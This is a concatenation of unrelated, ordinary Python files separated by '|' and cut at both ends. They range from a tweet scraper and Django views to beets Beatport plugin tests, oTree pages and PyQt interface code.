await self.request_text(
method="POST", url=upload_url, data={"file1": file_data}
)
)
photo_sizes = (
await api.photos.save_messages_photo(
photo=upload_data["photo"],
server=upload_data["server"],
hash=upload_data["hash"],
)
).response
return photo_sizes
|
import re
words = []
with open('4news_dictionary.txt') as openfileobject:
for line in openfileobject:
obj = {}
obj["word"] = re.findall(r"\s+\d+\s+(\w+)", line)[0]
words.append(obj)
i=0
with open('p1.csv') as openfileobject:
for line in openfileobject:
matches = re.findall(r"(.+),(.+),(.+),(.+)", line)
words[i]["freq1"] = float(matches[0][0])
words[i]["freq2"] = float(matches[0][1])
words[i]["freq3"] = float(matches[0][2])
words[i]["freq4"] = float(matches[0][3])
i += 1
topic1 = sorted(words, key=lambda x: x["freq1"], reverse=True)
print "Words for topic 1 (the religion of CHRISTIANITY) : "
for i in xrange(0,10):
print "{} : {}".format(topic1[i]["word"], topic1[i]["freq1"])
print "\r\n\r\n"
topic2 = sorted(words, key=lambda x: x["freq2"], reverse=True)
print "Words for topic 2 (impact of diet on HEALTH) : "
for i in xrange(0,10):
print "{} : {}".format(topic2[i]["word"], topic2[i]["freq2"])
print "\r\n\r\n"
topic3 = sorted(words, key=lambda x: x["freq3"], reverse=True)
print "Words for topic 3 (INFORMATION SECURITY in modern democracies) :"
for i in xrange(0,10):
print "{} : {}".format(topic3[i]["word"], topic3[i]["freq3"])
print "\r\n\r\n"
topic4 = sorted(words, key=lambda x: x["freq4"], reverse=True)
print "Words for topic 4 (SPACE EXPLORATION and discoveries by Nasa) :"
for i in xrange(0,10):
print "{} : {}".format(topic4[i]["word"], topic4[i]["freq4"])
print "\r\n\r\n"
|
a = float (input (' Digite um angulo '))
b = float (input (' Digita outro angulo '))
c = float (input ('Digite outro algulo denovo '))
if a < b + c and b < a + c and c < a + b and a < b + a :
print ('pode faze triangulo')
else:
print ('n pode faze triangulo')
# equilatero = todos os lados iguais
#isosceles = dois lados iguals e um diferente
# escaleno = todos os lados diferentes
#if a < b + c and b < a + c and c < a + b and a < b + a :
# print ('Da pra construir um triangulo')
#else:
# print('n da pra construir.')
#if a == b and b != c or a == c and c != b or b == c and c != a or b == a and a != c :
print ('Seu triangulo é isosceles')
##lif a == b and a == c or c == a and c == b or b == a and b == c :
#print ('Equilatedo')
#elif a != b and a != c or c != b and c != a or b != a and b != c :
print ('Seu triangulo é escaleno.')
|
import os
import requests
from .models import Countries, NeighbourCountry
def get_country_info():
all_countries = {}
url = 'https://restcountries.eu/rest/v2/all'
response = requests.get(url)
data = response.json()
country_list = []
d = {}
for j in data:
key = j['alpha3Code']
value = j['name']
d[key] = value
s=0
for i in data:
l = []
s+=1
nc = i['borders']
if nc:
for m in nc:
api_neighbour_name=str(d[m])
else:
api_neighbour_name="NULL"
for j in i['languages']:
l.append(j['name'])
if l:
api_neighbour_languages = ','.join(l)
else:
api_neighbour_languages = "NULL"
country_data = Countries(
name=i['name'],
alphacode2=i['alpha2Code'],
capital=i['capital'],
population=i['population'],
timezone=' '.join(map(str, i['timezones'])),
flag_url=i['flag'],
)
country_data.save()
NeighbourCountry.objects.create(nname=api_neighbour_name,
nlanguages=api_neighbour_languages,ncountry_id =s
)
l.clear()
country_list.append(i)
# for im in data:
# nc = im['borders']
# border = Countries.objects.get(id=pk)
# if nc:
# for m in nc:
# neighbour_data = NeighbourCountry(border_country_name=str(d[m]))
# else:
# neighbour_data= NeighbourCountry(border_country_name="NULL")
# neighbour_data.save()
# for il in data:
# l = []
# for j in il['languages']:
# l.append(j['name'])
# if l:
# border_language_data = Languages(
# border_languages_list = ','.join(l)
# )
# l.clear()
# else:
# border_language_data = Languages(
# border_languages_list = "NULL"
# )
# border_language_data.save()
return country_list
|
print("This is hello")
|
import re, tweepy, datetime, time, json, csv
from tweepy import OAuthHandler
#It will fetch all the tweets from current date till the startDate
startDate = datetime.datetime(2020, 1, 1, 0, 0, 0)
endDate = datetime.datetime(2020,12,1,0,0,0)
# keys and tokens from my Twitter Dev Console
access_token=""
access_token_secret=""
consumer_key=""
consumer_secret=""
# attempt authentication
try:
# create OAuthHandler object
auth = OAuthHandler(consumer_key, consumer_secret)
# set access token and secret
auth.set_access_token(access_token, access_token_secret)
# create tweepy API object to fetch tweets
api = tweepy.API(auth, wait_on_rate_limit=True)
#data = self.api.rate_limit_status()
print("Authentication Successfull")
except:
print("Error: Authentication Failed")
def clean_tweet(tweet):
'''
Utility function to clean tweet text by removing links, special characters
using simple regex statements.
'''
return str(' '.join(re.sub("(@[A-Za-z0-9]+)|([^0-9A-Za-z \t])|(\w+:\/\/\S+)", " ", tweet).split()))
def get_tweets(query, count, start):
'''
Main function to fetch tweets and parse them.
'''
# empty list to store tweets
tweets = []
# call twitter api to fetch tweets
#Creates a text-file and appends all the cleaned tweets
with open('Output.csv', 'a', encoding="utf8", newline='') as the_file:
fieldnames = ['text', 'date', 'number_of_retweet']
writer = csv.DictWriter(the_file, fieldnames=fieldnames)
writer.writerow({'text':'text', 'date':'date', 'number_of_retweet':'retweet_count'})
print("Fetching tweets.........")
for tweet in tweepy.Cursor(api.search, q=query, lang="en").items(count):
if tweet.created_at > startDate and tweet.created_at < endDate:
cleaned_tweet = clean_tweet(tweet.text)
if cleaned_tweet not in tweets:
tweets.append(cleaned_tweet)
writer.writerow({'text':cleaned_tweet, 'date':tweet.created_at, 'number_of_retweet':tweet.retweet_count})
the_file.close()
# returns the list of tweets
return tweets
#Calls the function by specifing keyword, number of tweets to be parsed from API and start date
Tweets = get_tweets(query = '$AMZN',count=20000, start=startDate)
print("Number of tweets fetched = ", len(Tweets))
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Make sure paths are normalized with VS macros properly expanded on Windows.
"""
import TestGyp
import sys
if sys.platform == 'win32':
test = TestGyp.TestGyp(formats=['ninja'])
test.run_gyp('normalize-paths.gyp')
# We can't use existence tests because any case will pass, so we check the
# contents of ninja files directly since that's what we're most concerned
# with anyway.
subninja = open(test.built_file_path('obj/some_target.ninja')).read()
if '$!product_dir' in subninja:
test.fail_test()
if 'out\\Default' in subninja:
test.fail_test()
second = open(test.built_file_path('obj/second.ninja')).read()
if ('..\\..\\things\\AnotherName.exe' in second or
'AnotherName.exe' not in second):
test.fail_test()
copytarget = open(test.built_file_path('obj/copy_target.ninja')).read()
if '$(VSInstallDir)' in copytarget:
test.fail_test()
action = open(test.built_file_path('obj/action.ninja')).read()
if '..\\..\\out\\Default' in action:
test.fail_test()
if '..\\..\\SomethingElse' in action or 'SomethingElse' not in action:
test.fail_test()
if '..\\..\\SomeOtherInput' in action or 'SomeOtherInput' not in action:
test.fail_test()
test.pass_test()
|
from otree.api import Currency as c, currency_range
from ._builtin import Page, WaitPage
from .models import Constants
# Expose variables for all templates. Attempted to create this as prettier function, but was not able.
def vars_for_all_templates(self):
return {
'lottery_a_hi': c(self.session.vars['payoffs']['A'][0]),
'lottery_a_lo': c(self.session.vars['payoffs']['A'][1]),
'lottery_b_hi': c(self.session.vars['payoffs']['B'][0]),
'lottery_b_lo': c(self.session.vars['payoffs']['B'][1]),
'num_choices': Constants.num_choices
}
# Class for the IntroPage. Inherits attributes from Page Class
class IntroPage(Page):
# Get forms to be displayed on IntroPage
form_model = 'player'
form_fields = ['name', 'risk']
# Class for the DecisionPage. Inherits attributes from Page Class
class DecisionPage(Page):
form_model = 'player'
# Unzip the list of choices, in order to create form fields corresponding to the number of choices
def get_form_fields(self):
form_fields = [list(t) for t in zip(*self.session.vars['choices'])][1]
print(form_fields)
return form_fields
# Expose variables that will only be available on this page.
def vars_for_template(self):
return {
"choices": self.session.vars['choices'],
}
# Triggers the function that set draws the payoff of the user before the user is taken to the result page. This
# should be changed if we were to make a game with several rounds.
def before_next_page(self):
self.player.set_payoffs()
# Class for the ResultsPage. Inherits attributes from Page Class
class ResultsPage(Page):
# Expose variables that will only be available on this page.
def vars_for_template(self):
return {
"index_to_pay": self.participant.vars['index_to_pay'],
}
# The sequence the app will order the pages.
page_sequence = [IntroPage, DecisionPage, ResultsPage]
|
# This file is part of beets.
# Copyright 2016, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Tests for the 'beatport' plugin.
"""
import unittest
from test import _common
from test.helper import TestHelper
from datetime import timedelta
from beetsplug import beatport
from beets import library
class BeatportTest(_common.TestCase, TestHelper):
def _make_release_response(self):
"""Returns a dict that mimics a response from the beatport API.
The results were retrieved from:
https://oauth-api.beatport.com/catalog/3/releases?id=1742984
The list of elements on the returned dict is incomplete, including just
those required for the tests on this class.
"""
results = {
"id": 1742984,
"type": "release",
"name": "Charade",
"slug": "charade",
"releaseDate": "2016-04-11",
"publishDate": "2016-04-11",
"audioFormat": "",
"category": "Release",
"currentStatus": "General Content",
"catalogNumber": "GR089",
"description": "",
"label": {
"id": 24539,
"name": "Gravitas Recordings",
"type": "label",
"slug": "gravitas-recordings"
},
"artists": [{
"id": 326158,
"name": "Supersillyus",
"slug": "supersillyus",
"type": "artist"
}],
"genres": [{
"id": 9,
"name": "Breaks",
"slug": "breaks",
"type": "genre"
}],
}
return results
def _make_tracks_response(self):
"""Return a list that mimics a response from the beatport API.
The results were retrieved from:
https://oauth-api.beatport.com/catalog/3/tracks?releaseId=1742984
The list of elements on the returned list is incomplete, including just
those required for the tests on this class.
"""
results = [{
"id": 7817567,
"type": "track",
"sku": "track-7817567",
"name": "Mirage a Trois",
"trackNumber": 1,
"mixName": "Original Mix",
"title": "Mirage a Trois (Original Mix)",
"slug": "mirage-a-trois-original-mix",
"releaseDate": "2016-04-11",
"publishDate": "2016-04-11",
"currentStatus": "General Content",
"length": "7:05",
"lengthMs": 425421,
"bpm": 90,
"key": {
"standard": {
"letter": "G",
"sharp": False,
"flat": False,
"chord": "minor"
},
"shortName": "Gmin"
},
"artists": [{
"id": 326158,
"name": "Supersillyus",
"slug": "supersillyus",
"type": "artist"
}],
"genres": [{
"id": 9,
"name": "Breaks",
"slug": "breaks",
"type": "genre"
}],
"subGenres": [{
"id": 209,
"name": "Glitch Hop",
"slug": "glitch-hop",
"type": "subgenre"
}],
"release": {
"id": 1742984,
"name": "Charade",
"type": "release",
"slug": "charade"
},
"label": {
"id": 24539,
"name": "Gravitas Recordings",
"type": "label",
"slug": "gravitas-recordings",
"status": True
}
}, {
"id": 7817568,
"type": "track",
"sku": "track-7817568",
"name": "Aeon Bahamut",
"trackNumber": 2,
"mixName": "Original Mix",
"title": "Aeon Bahamut (Original Mix)",
"slug": "aeon-bahamut-original-mix",
"releaseDate": "2016-04-11",
"publishDate": "2016-04-11",
"currentStatus": "General Content",
"length": "7:38",
"lengthMs": 458000,
"bpm": 100,
"key": {
"standard": {
"letter": "G",
"sharp": False,
"flat": False,
"chord": "major"
},
"shortName": "Gmaj"
},
"artists": [{
"id": 326158,
"name": "Supersillyus",
"slug": "supersillyus",
"type": "artist"
}],
"genres": [{
"id": 9,
"name": "Breaks",
"slug": "breaks",
"type": "genre"
}],
"subGenres": [{
"id": 209,
"name": "Glitch Hop",
"slug": "glitch-hop",
"type": "subgenre"
}],
"release": {
"id": 1742984,
"name": "Charade",
"type": "release",
"slug": "charade"
},
"label": {
"id": 24539,
"name": "Gravitas Recordings",
"type": "label",
"slug": "gravitas-recordings",
"status": True
}
}, {
"id": 7817569,
"type": "track",
"sku": "track-7817569",
"name": "Trancendental Medication",
"trackNumber": 3,
"mixName": "Original Mix",
"title": "Trancendental Medication (Original Mix)",
"slug": "trancendental-medication-original-mix",
"releaseDate": "2016-04-11",
"publishDate": "2016-04-11",
"currentStatus": "General Content",
"length": "1:08",
"lengthMs": 68571,
"bpm": 141,
"key": {
"standard": {
"letter": "F",
"sharp": False,
"flat": False,
"chord": "major"
},
"shortName": "Fmaj"
},
"artists": [{
"id": 326158,
"name": "Supersillyus",
"slug": "supersillyus",
"type": "artist"
}],
"genres": [{
"id": 9,
"name": "Breaks",
"slug": "breaks",
"type": "genre"
}],
"subGenres": [{
"id": 209,
"name": "Glitch Hop",
"slug": "glitch-hop",
"type": "subgenre"
}],
"release": {
"id": 1742984,
"name": "Charade",
"type": "release",
"slug": "charade"
},
"label": {
"id": 24539,
"name": "Gravitas Recordings",
"type": "label",
"slug": "gravitas-recordings",
"status": True
}
}, {
"id": 7817570,
"type": "track",
"sku": "track-7817570",
"name": "A List of Instructions for When I'm Human",
"trackNumber": 4,
"mixName": "Original Mix",
"title": "A List of Instructions for When I'm Human (Original Mix)",
"slug": "a-list-of-instructions-for-when-im-human-original-mix",
"releaseDate": "2016-04-11",
"publishDate": "2016-04-11",
"currentStatus": "General Content",
"length": "6:57",
"lengthMs": 417913,
"bpm": 88,
"key": {
"standard": {
"letter": "A",
"sharp": False,
"flat": False,
"chord": "minor"
},
"shortName": "Amin"
},
"artists": [{
"id": 326158,
"name": "Supersillyus",
"slug": "supersillyus",
"type": "artist"
}],
"genres": [{
"id": 9,
"name": "Breaks",
"slug": "breaks",
"type": "genre"
}],
"subGenres": [{
"id": 209,
"name": "Glitch Hop",
"slug": "glitch-hop",
"type": "subgenre"
}],
"release": {
"id": 1742984,
"name": "Charade",
"type": "release",
"slug": "charade"
},
"label": {
"id": 24539,
"name": "Gravitas Recordings",
"type": "label",
"slug": "gravitas-recordings",
"status": True
}
}, {
"id": 7817571,
"type": "track",
"sku": "track-7817571",
"name": "The Great Shenanigan",
"trackNumber": 5,
"mixName": "Original Mix",
"title": "The Great Shenanigan (Original Mix)",
"slug": "the-great-shenanigan-original-mix",
"releaseDate": "2016-04-11",
"publishDate": "2016-04-11",
"currentStatus": "General Content",
"length": "9:49",
"lengthMs": 589875,
"bpm": 123,
"key": {
"standard": {
"letter": "E",
"sharp": False,
"flat": True,
"chord": "major"
},
"shortName": "E♭maj"
},
"artists": [{
"id": 326158,
"name": "Supersillyus",
"slug": "supersillyus",
"type": "artist"
}],
"genres": [{
"id": 9,
"name": "Breaks",
"slug": "breaks",
"type": "genre"
}],
"subGenres": [{
"id": 209,
"name": "Glitch Hop",
"slug": "glitch-hop",
"type": "subgenre"
}],
"release": {
"id": 1742984,
"name": "Charade",
"type": "release",
"slug": "charade"
},
"label": {
"id": 24539,
"name": "Gravitas Recordings",
"type": "label",
"slug": "gravitas-recordings",
"status": True
}
}, {
"id": 7817572,
"type": "track",
"sku": "track-7817572",
"name": "Charade",
"trackNumber": 6,
"mixName": "Original Mix",
"title": "Charade (Original Mix)",
"slug": "charade-original-mix",
"releaseDate": "2016-04-11",
"publishDate": "2016-04-11",
"currentStatus": "General Content",
"length": "7:05",
"lengthMs": 425423,
"bpm": 123,
"key": {
"standard": {
"letter": "A",
"sharp": False,
"flat": False,
"chord": "major"
},
"shortName": "Amaj"
},
"artists": [{
"id": 326158,
"name": "Supersillyus",
"slug": "supersillyus",
"type": "artist"
}],
"genres": [{
"id": 9,
"name": "Breaks",
"slug": "breaks",
"type": "genre"
}],
"subGenres": [{
"id": 209,
"name": "Glitch Hop",
"slug": "glitch-hop",
"type": "subgenre"
}],
"release": {
"id": 1742984,
"name": "Charade",
"type": "release",
"slug": "charade"
},
"label": {
"id": 24539,
"name": "Gravitas Recordings",
"type": "label",
"slug": "gravitas-recordings",
"status": True
}
}]
return results
def setUp(self):
self.setup_beets()
self.load_plugins('beatport')
self.lib = library.Library(':memory:')
# Set up 'album'.
response_release = self._make_release_response()
self.album = beatport.BeatportRelease(response_release)
# Set up 'tracks'.
response_tracks = self._make_tracks_response()
self.tracks = [beatport.BeatportTrack(t) for t in response_tracks]
# Set up 'test_album'.
self.test_album = self.mk_test_album()
# Set up 'test_tracks'
self.test_tracks = self.test_album.items()
def tearDown(self):
self.unload_plugins()
self.teardown_beets()
def mk_test_album(self):
items = [_common.item() for _ in range(6)]
for item in items:
item.album = 'Charade'
item.catalognum = 'GR089'
item.label = 'Gravitas Recordings'
item.artist = 'Supersillyus'
item.year = 2016
item.comp = False
item.label_name = 'Gravitas Recordings'
item.genre = 'Glitch Hop'
item.year = 2016
item.month = 4
item.day = 11
item.mix_name = 'Original Mix'
items[0].title = 'Mirage a Trois'
items[1].title = 'Aeon Bahamut'
items[2].title = 'Trancendental Medication'
items[3].title = 'A List of Instructions for When I\'m Human'
items[4].title = 'The Great Shenanigan'
items[5].title = 'Charade'
items[0].length = timedelta(minutes=7, seconds=5).total_seconds()
items[1].length = timedelta(minutes=7, seconds=38).total_seconds()
items[2].length = timedelta(minutes=1, seconds=8).total_seconds()
items[3].length = timedelta(minutes=6, seconds=57).total_seconds()
items[4].length = timedelta(minutes=9, seconds=49).total_seconds()
items[5].length = timedelta(minutes=7, seconds=5).total_seconds()
items[0].url = 'mirage-a-trois-original-mix'
items[1].url = 'aeon-bahamut-original-mix'
items[2].url = 'trancendental-medication-original-mix'
items[3].url = 'a-list-of-instructions-for-when-im-human-original-mix'
items[4].url = 'the-great-shenanigan-original-mix'
items[5].url = 'charade-original-mix'
counter = 0
for item in items:
counter += 1
item.track_number = counter
items[0].bpm = 90
items[1].bpm = 100
items[2].bpm = 141
items[3].bpm = 88
items[4].bpm = 123
items[5].bpm = 123
items[0].initial_key = 'Gmin'
items[1].initial_key = 'Gmaj'
items[2].initial_key = 'Fmaj'
items[3].initial_key = 'Amin'
items[4].initial_key = 'E♭maj'
items[5].initial_key = 'Amaj'
for item in items:
self.lib.add(item)
album = self.lib.add_album(items)
album.store()
return album
# Test BeatportRelease.
def test_album_name_applied(self):
self.assertEqual(self.album.name, self.test_album['album'])
def test_catalog_number_applied(self):
self.assertEqual(self.album.catalog_number,
self.test_album['catalognum'])
def test_label_applied(self):
self.assertEqual(self.album.label_name, self.test_album['label'])
def test_category_applied(self):
self.assertEqual(self.album.category, 'Release')
def test_album_url_applied(self):
self.assertEqual(self.album.url,
'https://beatport.com/release/charade/1742984')
# Test BeatportTrack.
def test_title_applied(self):
for track, test_track in zip(self.tracks, self.test_tracks):
self.assertEqual(track.name, test_track.title)
def test_mix_name_applied(self):
for track, test_track in zip(self.tracks, self.test_tracks):
self.assertEqual(track.mix_name, test_track.mix_name)
def test_length_applied(self):
for track, test_track in zip(self.tracks, self.test_tracks):
self.assertEqual(int(track.length.total_seconds()),
int(test_track.length))
def test_track_url_applied(self):
# Specify beatport ids here because an 'item.id' is beets-internal.
ids = [
7817567,
7817568,
7817569,
7817570,
7817571,
7817572,
]
# Concatenate with 'id' to pass strict equality test.
for track, test_track, id in zip(self.tracks, self.test_tracks, ids):
self.assertEqual(
track.url, 'https://beatport.com/track/' +
test_track.url + '/' + str(id))
def test_bpm_applied(self):
for track, test_track in zip(self.tracks, self.test_tracks):
self.assertEqual(track.bpm, test_track.bpm)
def test_initial_key_applied(self):
for track, test_track in zip(self.tracks, self.test_tracks):
self.assertEqual(track.initial_key, test_track.initial_key)
def test_genre_applied(self):
for track, test_track in zip(self.tracks, self.test_tracks):
self.assertEqual(track.genre, test_track.genre)
class BeatportResponseEmptyTest(_common.TestCase, TestHelper):
def _make_tracks_response(self):
results = [{
"id": 7817567,
"name": "Mirage a Trois",
"genres": [{
"id": 9,
"name": "Breaks",
"slug": "breaks",
"type": "genre"
}],
"subGenres": [{
"id": 209,
"name": "Glitch Hop",
"slug": "glitch-hop",
"type": "subgenre"
}],
}]
return results
def setUp(self):
self.setup_beets()
self.load_plugins('beatport')
self.lib = library.Library(':memory:')
# Set up 'tracks'.
self.response_tracks = self._make_tracks_response()
self.tracks = [beatport.BeatportTrack(t) for t in self.response_tracks]
# Make alias to be congruent with class `BeatportTest`.
self.test_tracks = self.response_tracks
def tearDown(self):
self.unload_plugins()
self.teardown_beets()
def test_response_tracks_empty(self):
response_tracks = []
tracks = [beatport.BeatportTrack(t) for t in response_tracks]
self.assertEqual(tracks, [])
def test_sub_genre_empty_fallback(self):
"""No 'sub_genre' is provided. Test if fallback to 'genre' works.
"""
self.response_tracks[0]['subGenres'] = []
tracks = [beatport.BeatportTrack(t) for t in self.response_tracks]
self.test_tracks[0]['subGenres'] = []
self.assertEqual(tracks[0].genre,
self.test_tracks[0]['genres'][0]['name'])
def test_genre_empty(self):
"""No 'genre' is provided. Test if 'sub_genre' is applied.
"""
self.response_tracks[0]['genres'] = []
tracks = [beatport.BeatportTrack(t) for t in self.response_tracks]
self.test_tracks[0]['genres'] = []
self.assertEqual(tracks[0].genre,
self.test_tracks[0]['subGenres'][0]['name'])
def suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
from django.shortcuts import render
import joblib
import os
from pathlib import Path
import numpy as np
import requests
import json
#-----------------------------------------------------------------------
# Loading model at runtime
base_dir = Path(__file__).resolve(strict=True).parent.parent
model = os.path.join(base_dir, 'model.pkl')
joblib_model = joblib.load(model)
#-----------------------------------------------------------------------
# Views
def home(request):
txt = "-0.35318941, 0.92823624, -1.29844323, 1.94810045, -4.50994689, 1.30580477, -0.01948593, -0.50923778, -2.64339762, 1.28354519, -2.5153557 , -4.50131481, 2.09307501, -5.41888894, -1.24701371, -3.82826818, 0.39905034, -6.36649951, -7.55096809, -4.90276667, 0.15289203, 0.25041544, 1.17803195, 1.36098858, -0.27201306, -0.3259479 , 0.29070267, 0.84129459, 0.64309425, 0.20115575"
context = {'preds':'', 'txt':txt}
return render(request, 'cardfraud/base.html', context)
def predict_view(request):
result = -1
preds = ''
data = request.GET.get('data')
if request.method == 'GET':
try:
test = np.fromstring(data[1:-1], dtype=np.float, sep=',')
test = test.reshape(1, -1)
result = joblib_model.predict(test)
if result == 0:
preds = 'Not Fraud'
elif result == 1:
preds= 'Fraud'
else:
preds = 'Not available'
except ValueError:
preds = 'Please, enter correct array data - 30 features'
context = {'preds':preds, 'txt':data}
return render(request, 'cardfraud/base.html', context)
def predict_using_api(request):
array_data = request.GET.get('data')
json_data = {"array_data" : array_data}
preds = requests.post('http://127.0.0.1:8000/api/get_preds_api/', json=json_data).json()
context = {'preds':preds, 'txt':array_data}
return render(request, 'cardfraud/base.html', context)
def notebook(request):
return render(request, 'cardfraud/notebook.html', {})
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'adminstration.ui'
#
# Created by: PyQt5 UI code generator 5.15.2
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
from views.dialog import CustomDialog
from DB import infoTable
class Ui_AdminstrationWindow(object):
def __init__(self,*args):
print(args)
self.idVal = None
self.locVal = None
self.startVal = None
self.endVal = None
self.residentId = None
self.priorityVal = None
self.isInfoPresent = False
self.rawMaterialVal = None
self.machinesVal = None
self.statisticsVal = None
if len(args) == 1 and len(args[0]) == 10:
args = args[0]
self.idVal = args[0]
self.locVal = args[1]
self.startVal = args[2]
self.endVal = args[3]
self.residentId = args[4]
if args[5] is not None:
self.isInfoPresent = True
self.priorityVal = str(args[6])
self.rawMaterialVal = args[7]
self.machinesVal = args[8]
self.statisticsVal = args[9]
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(600, 600)
MainWindow.setFixedSize(600,600)
font = QtGui.QFont()
font.setPointSize(9)
MainWindow.setFont(font)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(220, 0, 171, 51))
font = QtGui.QFont()
font.setPointSize(16)
font.setUnderline(True)
self.label.setFont(font)
self.label.setObjectName("label")
self.line = QtWidgets.QFrame(self.centralwidget)
self.line.setGeometry(QtCore.QRect(10, 290, 581, 20))
self.line.setFrameShape(QtWidgets.QFrame.HLine)
self.line.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line.setObjectName("line")
self.label_2 = QtWidgets.QLabel(self.centralwidget)
self.label_2.setGeometry(QtCore.QRect(20, 60, 151, 31))
font = QtGui.QFont()
font.setPointSize(11)
self.label_2.setFont(font)
self.label_2.setObjectName("label_2")
self.label_3 = QtWidgets.QLabel(self.centralwidget)
self.label_3.setGeometry(QtCore.QRect(10, 130, 171, 21))
font = QtGui.QFont()
font.setPointSize(10)
self.label_3.setFont(font)
self.label_3.setObjectName("label_3")
self.rawMaterialInput = QtWidgets.QPlainTextEdit(self.centralwidget)
self.rawMaterialInput.setGeometry(QtCore.QRect(200, 120, 341, 161))
font = QtGui.QFont()
font.setPointSize(10)
self.rawMaterialInput.setFont(font)
self.rawMaterialInput.setObjectName("rawMaterialInput")
self.line_2 = QtWidgets.QFrame(self.centralwidget)
self.line_2.setGeometry(QtCore.QRect(10, 90, 221, 20))
self.line_2.setFrameShape(QtWidgets.QFrame.HLine)
self.line_2.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_2.setObjectName("line_2")
self.label_4 = QtWidgets.QLabel(self.centralwidget)
self.label_4.setGeometry(QtCore.QRect(20, 330, 161, 21))
font = QtGui.QFont()
font.setPointSize(10)
self.label_4.setFont(font)
self.label_4.setObjectName("label_4")
self.machineInput = QtWidgets.QPlainTextEdit(self.centralwidget)
self.machineInput.setGeometry(QtCore.QRect(200, 320, 341, 161))
font = QtGui.QFont()
font.setPointSize(10)
self.machineInput.setFont(font)
self.machineInput.setObjectName("machineInput")
self.updateBtn = QtWidgets.QPushButton(self.centralwidget)
self.updateBtn.setGeometry(QtCore.QRect(410, 490, 121, 41))
font = QtGui.QFont()
font.setPointSize(10)
self.updateBtn.setFont(font)
self.updateBtn.setMouseTracking(True)
self.updateBtn.setObjectName("updateBtn")
self.updateBtn.clicked.connect(lambda :self.addResources(MainWindow))
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 599, 26))
self.menubar.setObjectName("menubar")
self.menuMenu = QtWidgets.QMenu(self.menubar)
self.menuMenu.setObjectName("menuMenu")
self.menuAbout = QtWidgets.QMenu(self.menubar)
self.menuAbout.setObjectName("menuAbout")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.actiondevelopers = QtWidgets.QAction(MainWindow)
self.actiondevelopers.setObjectName("actiondevelopers")
self.menuAbout.addAction(self.actiondevelopers)
self.menubar.addAction(self.menuMenu.menuAction())
self.menubar.addAction(self.menuAbout.menuAction())
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "update resources"))
self.label.setText(_translate("MainWindow", "Adminstration"))
self.label_2.setText(_translate("MainWindow", "Update Resources :"))
self.label_3.setText(_translate("MainWindow", " Available rawMaterial:"))
self.label_4.setText(_translate("MainWindow", "Available Machines:"))
self.updateBtn.setText(_translate("MainWindow", "Update"))
self.menuMenu.setTitle(_translate("MainWindow", "Menu"))
self.menuAbout.setTitle(_translate("MainWindow", "About"))
self.actiondevelopers.setText(_translate("MainWindow", "developers"))
# SET VALUES FROM DB
self.rawMaterialInput.setPlainText(_translate("MainWindow", self.rawMaterialVal))
self.machineInput.setPlainText(_translate("MainWindow", self.machinesVal))
if self.isInfoPresent:
val = infoTable.getComplaintInfo(str(self.idVal))
print(val)
def addResources(self,win):
rawMaterial = self.rawMaterialInput.toPlainText()
machine = self.machineInput.toPlainText()
mapping = {
'complainId' : self.idVal,
'rawMaterial' : rawMaterial,
'machines' : machine
}
print(mapping)
try:
if self.isInfoPresent:
infoTable.updateMaterialInfo(mapping)
else:
infoTable.makeMaterialInfo(mapping)
msg = CustomDialog.init_message('Success', 'Database Updated')
if msg.exec_():
win.close()
except Exception as e:
print(e)
msg = CustomDialog.init_message('Warning', str(e), 'warning')
msg.exec_()
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_AdminstrationWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
|
from __future__ import print_function
import sys
import os
import time
import subprocess
import multiprocessing
import numpy as np
import matplotlib
import matplotlib.patches as patches
try:
from PyQt5 import QtCore, QtWidgets, QtGui # pylint: disable=import-error
matplotlib.use('qt5agg')
from matplotlib.backends.backend_qt5agg import FigureCanvas # pylint: disable=no-name-in-module
os.environ['QT_API'] = 'pyqt5'
except ImportError:
import sip
sip.setapi('QString', 2)
from PyQt4 import QtCore, QtGui # pylint: disable=import-error
from PyQt4 import QtGui as QtWidgets # pylint: disable=import-error
matplotlib.use('qt4agg')
from matplotlib.backends.backend_qt4agg import FigureCanvas # pylint: disable=no-name-in-module
os.environ['QT_API'] = 'pyqt'
from . import worker
class IniHighlighter(QtGui.QSyntaxHighlighter):
def __init__(self, parent):
super(IniHighlighter, self).__init__(parent)
self.char_formats = [
self.make_charformat('red'),
self.make_charformat('darkGreen', bold=True),
self.make_charformat('darkBlue'),
self.make_charformat('gray'),
]
patterns = [r'\[.*\]', r'^(.*)=', r'=([^\n]*)', r'#[^\n]*']
self.rules = [QtCore.QRegExp(p) for p in patterns]
def make_charformat(self, color, bold=False, italics=False):
cf = QtGui.QTextCharFormat()
cf.setForeground(QtGui.QBrush(QtGui.QColor(color)))
if bold:
cf.setFontWeight(QtGui.QFont.Bold)
cf.setFontItalic(italics)
return cf
def highlightBlock(self, text):
for rule, cf in zip(self.rules, self.char_formats):
